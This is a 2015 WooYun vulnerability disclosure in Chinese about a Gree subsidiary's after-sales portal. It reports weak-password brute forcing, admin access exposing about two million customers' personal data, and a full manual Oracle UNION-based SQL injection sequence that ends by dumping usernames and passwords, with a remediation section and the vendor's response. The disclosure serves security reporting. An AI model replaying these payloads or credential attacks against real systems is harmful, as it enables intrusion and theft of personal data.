当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154021

漏洞标题:格力空调多处漏洞涉及200万用户信息(Oracle手工SQL注入)

相关厂商:格力空调

漏洞作者: 进击的zjx

提交时间:2015-11-19 10:49

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-19: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

oracle手注学习记录

详细说明:

重庆明辉格力电器销售有限公司,1998年创立于重庆市高新技术开发区,主要负责格力电器在重庆、四川、云南、贵州和西藏等西南区域的市场开发、产品销售、销售渠道建设与管理及售后服务工作。
格力的子公司。
**.**.**.**:8010/
重庆明辉格力售后系统
0x01 无验证码,无错误限制,可爆破

2007
2006
2010
2011
2008
2014
2015
2012
2017
2018
2019
2020
2021
2016
2013
2022
2023
2024
2025
2029
2026
2028
2027
2030
2031
2032
2037
2036
2038
2040
2034
2033
2041
2043
2044
2045
2035
2047
2049
2039
2050
2042
2048
2046


爆到了上述一堆账号,密码为123456
0x02 随便选一个,成功登陆后台

5.JPG


泄露206万客户信息

6.JPG


65万安装单,泄露用户详细地址电话等

7.JPG


还有短信平台等信息

漏洞证明:

0x03 sql注入
后台找到个注入点
**.**.**.**:8010/network/AnnouncementInfo.aspx?id=535
手工注入一下

**.**.**.**:8010/network/AnnouncementInfo.aspx?id=535 and 1=1
**.**.**.**:8010/network/AnnouncementInfo.aspx?id=535 and 1=2


返回页面不同

**.**.**.**:8010/network/AnnouncementInfo.aspx?id=535 and (select count (*) from dual)>0


页面返回正常,说明是oracle数据库。dual为oracle的公用表

**.**.**.**:8010/network/AnnouncementInfo.aspx?id=535 order by 7 正常
**.**.**.**:8010/network/AnnouncementInfo.aspx?id=535 order by 8 错误


说明有7个字段

**.**.**.**:8010/network/AnnouncementInfo.aspx?id=535 union select null,null,null,null,null,null,null from dual


通过改变每一位的null或者'null'来判断每一个字段是数字型还是字符型

**.**.**.**:8010/network/AnnouncementInfo.aspx?id=535 union select null,'null','null','null',null,null,'null' from dual


最终得到2,3,4,7位为字符型

**.**.**.**:8010/network/AnnouncementInfo.aspx?id=535 union select null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null from dual


第三位可以显示,爆数据库版本

9.JPG


**.**.**.**:8010/network/AnnouncementInfo.aspx?id=535 union select null,null,(SELECT name FROM v$database),null,null,null,null from dual


当前数据库为ORCL

11.JPG


**.**.**.**:8010/network/AnnouncementInfo.aspx?id=535 union select null,null,(select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual),null,null,null,null from dual


当前数据库账号UGLSH

10.JPG


**.**.**.**:8010/network/AnnouncementInfo.aspx?id=535 union select null,null,to_char(count(*)),null,null,null,null from USER_TABLES


第三位是字符型,所以要把count(*)数字型转换成字符型,用to_char()函数
得到151张表

12.JPG


**.**.**.**:8010/network/AnnouncementInfo.aspx?id=535 union select null,null,TABLE_NAME,null,null,null,null from USER_TABLES


可以查看当前151张表的具体名字,太长此处就不贴了。

**.**.**.**:8010/network/AnnouncementInfo.aspx?id=535 union select null,null,COLUMN_NAME,null,null,null,null from COLS where TABLE_NAME='USERINFO'


找到个USERINFO表,爆其字段,得到USERNAME和USERPWD等

**.**.**.**:8010/network/AnnouncementInfo.aspx?id=535 union select null,null,USERNAME||'='||USERPWD,null,null,null,null from USERINFO


USERINFO中的数据

13.JPG


到此为止!

修复方案:

弱口令修改;
SQL语句预编译;

版权声明:转载请注明来源 进击的zjx@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-24 17:05

厂商回复:

CNVD未直接复现所述情况,已经转由CNCERT下发给重庆分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价